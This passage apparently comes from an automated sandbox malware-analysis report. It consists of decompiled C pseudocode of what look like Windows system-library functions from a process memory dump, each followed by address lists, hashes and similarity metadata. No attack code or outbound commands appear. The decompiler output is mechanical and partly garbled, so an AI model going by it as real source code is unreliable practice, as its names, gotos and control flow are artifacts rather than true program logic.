						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x49df6e8);
						E0495D0E8(0x49f85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E049D88F5(_t80, _t85, 0x49f5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x49f86c0; // 0xc607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x49f86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04922280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E049D88F5(0x49f85ec, _t85, 0x49f5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0494AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x49fb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x49f84c0;
																			if(_t82 >=  *0x49f84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E049D9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0490922A(_t99);
										_t64 = E04927D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E049D8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x49f86c0; // 0xc607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x49f86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x49f86bc;
													_t87 = 0x49f86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04909240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x49f86c4;
												_t87 = 0x49f86c0;
												L27:
												E04939B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0495D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x49f5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x49f538c = _t51;
						goto L6;
					}
				}
			}




















                                                      0x04909082
                                                      0x04909083
                                                      0x04909084
                                                      0x04909085
                                                      0x04909087
                                                      0x04909096
                                                      0x04909098
                                                      0x04909098
                                                      0x0490909e
                                                      0x049090a8
                                                      0x049090e7
                                                      0x049090e7
                                                      0x049090aa
                                                      0x049090b0
                                                      0x049090b7
                                                      0x049090bd
                                                      0x049090dd
                                                      0x049090e6
                                                      0x049090bf
                                                      0x049090bf
                                                      0x049090c7
                                                      0x049090cf
                                                      0x049090f1
                                                      0x049090f2
                                                      0x049090f4
                                                      0x049090f5
                                                      0x049090f6
                                                      0x049090f7
                                                      0x049090f8
                                                      0x049090f9
                                                      0x049090fa
                                                      0x049090fb
                                                      0x049090fc
                                                      0x049090fd
                                                      0x049090fe
                                                      0x049090ff
                                                      0x04909100
                                                      0x04909102
                                                      0x04909107
                                                      0x0490910c
                                                      0x04909110
                                                      0x04909113
                                                      0x04909115
                                                      0x04909136
                                                      0x0490913f
                                                      0x04909143
                                                      0x049637e4
                                                      0x049637e4
                                                      0x04909117
                                                      0x04909117
                                                      0x0490911d
                                                      0x00000000
                                                      0x0490911f
                                                      0x0490911f
                                                      0x04909125
                                                      0x00000000
                                                      0x04909127
                                                      0x0490912d
                                                      0x04909130
                                                      0x04909134
                                                      0x04909158
                                                      0x0490915d
                                                      0x04909161
                                                      0x04909168
                                                      0x04963715
                                                      0x0490916e
                                                      0x0490916e
                                                      0x04909175
                                                      0x04909177
                                                      0x0490917e
                                                      0x0490917f
                                                      0x04909182
                                                      0x04909182
                                                      0x04909187
                                                      0x04909187
                                                      0x0490918a
                                                      0x0490918d
                                                      0x0490918f
                                                      0x04909192
                                                      0x04909195
                                                      0x04909198
                                                      0x04909198
                                                      0x04909198
                                                      0x0490919a
                                                      0x00000000
                                                      0x00000000
                                                      0x0496371f
                                                      0x04963721
                                                      0x04963727
                                                      0x0496372f
                                                      0x04963733
                                                      0x04963735
                                                      0x04963738
                                                      0x0496373b
                                                      0x0496373d
                                                      0x04963740
                                                      0x00000000
                                                      0x04963746
                                                      0x04963746
                                                      0x04963749
                                                      0x00000000
                                                      0x0496374f
                                                      0x0496374f
                                                      0x04963751
                                                      0x04963757
                                                      0x04963759
                                                      0x0496375c
                                                      0x0496375c
                                                      0x0496375e
                                                      0x0496375e
                                                      0x04963761
                                                      0x04963764
                                                      0x00000000
                                                      0x00000000
                                                      0x04963766
                                                      0x04963768
                                                      0x049637a3
                                                      0x049637a3
                                                      0x049637a5
                                                      0x049637a7
                                                      0x049637ad
                                                      0x049637b0
                                                      0x049637b2
                                                      0x049637bc
                                                      0x049637c2
                                                      0x049637c2
                                                      0x049637b2
                                                      0x04909187
                                                      0x04909187
                                                      0x0490918a
                                                      0x0490918d
                                                      0x0490918f
                                                      0x04909192
                                                      0x04909195
                                                      0x00000000
                                                      0x04909195
                                                      0x00000000
                                                      0x0496376a
                                                      0x0496376a
                                                      0x0496376a
                                                      0x0496376c
                                                      0x0496376c
                                                      0x0496376f
                                                      0x04963775
                                                      0x00000000
                                                      0x00000000
                                                      0x04963777
                                                      0x04963779
                                                      0x04963782
                                                      0x04963787
                                                      0x04963789
                                                      0x04963790
                                                      0x04963790
                                                      0x0496378b
                                                      0x0496378b
                                                      0x0496378b
                                                      0x04963792
                                                      0x04963795
                                                      0x00000000
                                                      0x04963795
                                                      0x00000000
                                                      0x04963779
                                                      0x04963798
                                                      0x00000000
                                                      0x04963798
                                                      0x00000000
                                                      0x04963768
                                                      0x0496379b
                                                      0x0496379b
                                                      0x04963751
                                                      0x04963749
                                                      0x00000000
                                                      0x04963740
                                                      0x049091a0
                                                      0x049091a3
                                                      0x049091a9
                                                      0x049091b0
                                                      0x00000000
                                                      0x049091b0
                                                      0x04909187
                                                      0x049091b4
                                                      0x049091b4
                                                      0x049091bb
                                                      0x049091c0
                                                      0x049091c5
                                                      0x049091c7
                                                      0x049637da
                                                      0x049091cd
                                                      0x049091cd
                                                      0x049091cd
                                                      0x049091d2
                                                      0x049091d5
                                                      0x04909239
                                                      0x04909239
                                                      0x049091d7
                                                      0x049091db
                                                      0x049091e1
                                                      0x049091e7
                                                      0x049091fd
                                                      0x04909203
                                                      0x0490921e
                                                      0x04909223
                                                      0x00000000
                                                      0x04909205
                                                      0x04909205
                                                      0x04909208
                                                      0x0490920c
                                                      0x04909214
                                                      0x04909214
                                                      0x0490920c
                                                      0x049091e9
                                                      0x049091e9
                                                      0x049091ee
                                                      0x049091f3
                                                      0x049091f3
                                                      0x049091f3
                                                      0x049091e7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04909134
                                                      0x04909125
                                                      0x0490911d
                                                      0x0490914e
                                                      0x049090d1
                                                      0x049090d1
                                                      0x049090d3
                                                      0x049090d6
                                                      0x049090d8
                                                      0x00000000
                                                      0x049090d8
                                                      0x049090cf

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e9a4ca4343607f06c5d88747224359dae58c17a2d9e4b38435c92c270ba8041
                                                      • Instruction ID: f6969aff75d849834f28505a20668217fff292689bf23f2573af54f212d561ff
                                                      • Opcode Fuzzy Hash: 1e9a4ca4343607f06c5d88747224359dae58c17a2d9e4b38435c92c270ba8041
                                                      • Instruction Fuzzy Hash: 1401AFB2605604DFE3299F18D840B12BBF9EB85325F268076E6059B7D2D3B5FC41CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0499C450, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E0499C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04949910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E049495B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E049495D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E049495D0();
				return L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                      0x0499c458
                                                      0x0499c45d
                                                      0x0499c466
                                                      0x0499c468
                                                      0x0499c469
                                                      0x0499c46a
                                                      0x0499c46b
                                                      0x0499c46e
                                                      0x0499c46f
                                                      0x0499c471
                                                      0x0499c476
                                                      0x0499c476
                                                      0x0499c47c
                                                      0x0499c47e
                                                      0x0499c480
                                                      0x0499c480
                                                      0x0499c483
                                                      0x0499c484
                                                      0x0499c486
                                                      0x0499c488
                                                      0x0499c48f
                                                      0x0499c491
                                                      0x0499c493
                                                      0x0499c493
                                                      0x0499c48f
                                                      0x0499c498
                                                      0x0499c49e
                                                      0x0499c4ad
                                                      0x0499c4ad
                                                      0x0499c4b2
                                                      0x0499c4b4
                                                      0x0499c4cd

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: eeedd85d300fa87d1a5e0119a5f9efa66a054a410becc7c1e5b5bf3e43cf475e
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: A90192B2240505BFEB21AF69CC80E63FB6DFFD4795F104535F11452564CB21BCA0CAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D4015, Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E049D4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04922280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04922280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x49f86ac);
					E0490F900(0x49f86d4, _t28);
					E0491FFB0(0x49f86ac, _t28, 0x49f86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0491FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                      0x049d401a
                                                      0x049d401e
                                                      0x049d4023
                                                      0x049d4028
                                                      0x049d4029
                                                      0x049d402b
                                                      0x049d402f
                                                      0x049d4043
                                                      0x049d4046
                                                      0x049d4051
                                                      0x049d4057
                                                      0x049d405f
                                                      0x049d4062
                                                      0x049d4067
                                                      0x049d406f
                                                      0x049d407c
                                                      0x049d407c
                                                      0x049d408c
                                                      0x049d408c
                                                      0x049d4097

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df5d265476b4a56408db734aafad43e0855c74585da660e11b270cec3c69fe20
                                                      • Instruction ID: 157df5ba718ad6738de3df17c386854327b5f5e88880ad7755934eecf02e0ad3
                                                      • Opcode Fuzzy Hash: df5d265476b4a56408db734aafad43e0855c74585da660e11b270cec3c69fe20
                                                      • Instruction Fuzzy Hash: EA017C72241A597FE751AB69CE80E13B7ACEB89768B000675B50893A21CB74FC11CAE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049C14FB, Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E049C14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x49fd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0494FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04927D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0494B640(E04949AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                      0x049c14fb
                                                      0x049c14fb
                                                      0x049c150a
                                                      0x049c1514
                                                      0x049c1519
                                                      0x049c151b
                                                      0x049c1526
                                                      0x049c152c
                                                      0x049c1534
                                                      0x049c1537
                                                      0x049c153a
                                                      0x049c1545
                                                      0x049c1557
                                                      0x049c1547
                                                      0x049c1550
                                                      0x049c1550
                                                      0x049c1562
                                                      0x049c1563
                                                      0x049c1565
                                                      0x049c156a
                                                      0x049c157f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e9baea6762613c4f4204ecfb6abbd6671549a94a14a9da4195129816a2ab53c
                                                      • Instruction ID: 895d5e7ec15555b82b737a4399f4e728e82458422db172a5be42cbd796c54ff1
                                                      • Opcode Fuzzy Hash: 9e9baea6762613c4f4204ecfb6abbd6671549a94a14a9da4195129816a2ab53c
                                                      • Instruction Fuzzy Hash: 5B01B971A00258AFDB14DFA8D841FAEB7B8EF84714F404066F905EB381D674EE00CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049C138A, Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E049C138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x49fd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0494FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04927D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0494B640(E04949AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                      0x049c138a
                                                      0x049c138a
                                                      0x049c1399
                                                      0x049c13a3
                                                      0x049c13a8
                                                      0x049c13aa
                                                      0x049c13b5
                                                      0x049c13bb
                                                      0x049c13c3
                                                      0x049c13c6
                                                      0x049c13c9
                                                      0x049c13d4
                                                      0x049c13e6
                                                      0x049c13d6
                                                      0x049c13df
                                                      0x049c13df
                                                      0x049c13f1
                                                      0x049c13f2
                                                      0x049c13f4
                                                      0x049c13f9
                                                      0x049c140e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 914cd3e319f8089e853b346b6d4a441b5ebdff2e67c5eeaa397dc6c84fa10012
                                                      • Instruction ID: e50a334c5ad710ddc70857c82747eb09a27879b2a646818d0d27ac6ea1a51c9e
                                                      • Opcode Fuzzy Hash: 914cd3e319f8089e853b346b6d4a441b5ebdff2e67c5eeaa397dc6c84fa10012
                                                      • Instruction Fuzzy Hash: AC015671A00218AFDB14DFA9D841FAEB7B8EF84714F404066F905EB281D674EE01CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049058EC, Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E049058EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x49fd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x48e5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04905943() != 0 &&  *0x49f5320 > 5) {
					E04987B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04987B5E( &_v28, _t28);
					_t11 = E04987B9C(0x49f5320, 0x48ebf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0494B640(_t11, _t17, _v8 ^ _t29, 0x48ebf15, _t27, _t28);
			}















                                                      0x049058fb
                                                      0x049058fe
                                                      0x04905906
                                                      0x0490590a
                                                      0x0490593c
                                                      0x0490593c
                                                      0x0490590c
                                                      0x0490590c
                                                      0x04905911
                                                      0x00000000
                                                      0x04905913
                                                      0x04905913
                                                      0x04905913
                                                      0x04905911
                                                      0x0490591d
                                                      0x04961035
                                                      0x0496103c
                                                      0x0496103f
                                                      0x04961056
                                                      0x04961056
                                                      0x0490593b

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c29ec088896edb3101c453d4fd1ff44a9e19e6fbc23c8a3d2467a92f60633a16
                                                      • Instruction ID: 2f897a87c800d2aa8676ec8db025a1d221285b4ea2c115e170649c11a80e1cc6
                                                      • Opcode Fuzzy Hash: c29ec088896edb3101c453d4fd1ff44a9e19e6fbc23c8a3d2467a92f60633a16
                                                      • Instruction Fuzzy Hash: C9018F31A00104AFE714EA69DC01ABE77ADEFC0278F9641B99915E7280EE60FD05CA94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491B02A, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0491B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04927D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04987016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                      0x0491b037
                                                      0x0491b039
                                                      0x0491b03b
                                                      0x0491b040
                                                      0x0496a60e
                                                      0x00000000
                                                      0x00000000
                                                      0x0496a61d
                                                      0x0491b04b
                                                      0x0491b04e
                                                      0x0496a627
                                                      0x0496a634
                                                      0x00000000
                                                      0x00000000
                                                      0x0496a641
                                                      0x0496a653
                                                      0x0496a643
                                                      0x0496a64c
                                                      0x0496a64c
                                                      0x0496a65b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0496a66c
                                                      0x0491b057
                                                      0x0491b057
                                                      0x0491b057
                                                      0x0491b046
                                                      0x0491b046
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: 0315304621cb24f81ce2ac7e8eb3e4e4c83de8f7441a0e74553eb4e13f0fd8dc
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: 48017C323009849FD322CB5CC988F7677DDEB46754F0904B1F91ACBA65E628FC40C620
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D1074, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049D1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E049D165E(__ebx, 0x49f8ae4, (__edx -  *0x49f8b04 >> 0x14) + (__edx -  *0x49f8b04 >> 0x14), __edi, __ecx, (__edx -  *0x49f8b04 >> 0x14) + (__edx -  *0x49f8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E049CAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04927D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E049BFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                      0x049d1074
                                                      0x049d1080
                                                      0x049d1082
                                                      0x049d108a
                                                      0x049d108f
                                                      0x049d1093
                                                      0x049d10ab
                                                      0x049d10ab
                                                      0x049d10c3
                                                      0x049d10cf
                                                      0x049d10e1
                                                      0x049d10d1
                                                      0x049d10da
                                                      0x049d10da
                                                      0x049d10e9
                                                      0x049d10f5
                                                      0x049d10f5
                                                      0x049d10fe

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 647479ebcdb131c60bad37162ec8d2aa0c56d74db47bd1dbe3f5f081f1a96c6c
                                                      • Instruction ID: b37279a1348f9d0715daee0463d2d4181340168299e97e27b1ff5c41c49a4a4f
                                                      • Opcode Fuzzy Hash: 647479ebcdb131c60bad37162ec8d2aa0c56d74db47bd1dbe3f5f081f1a96c6c
                                                      • Instruction Fuzzy Hash: E20124726047419FD711EF69CD05B1A77E9ABC4314F04CA39F88593690EE30F840CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049BFEC0, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
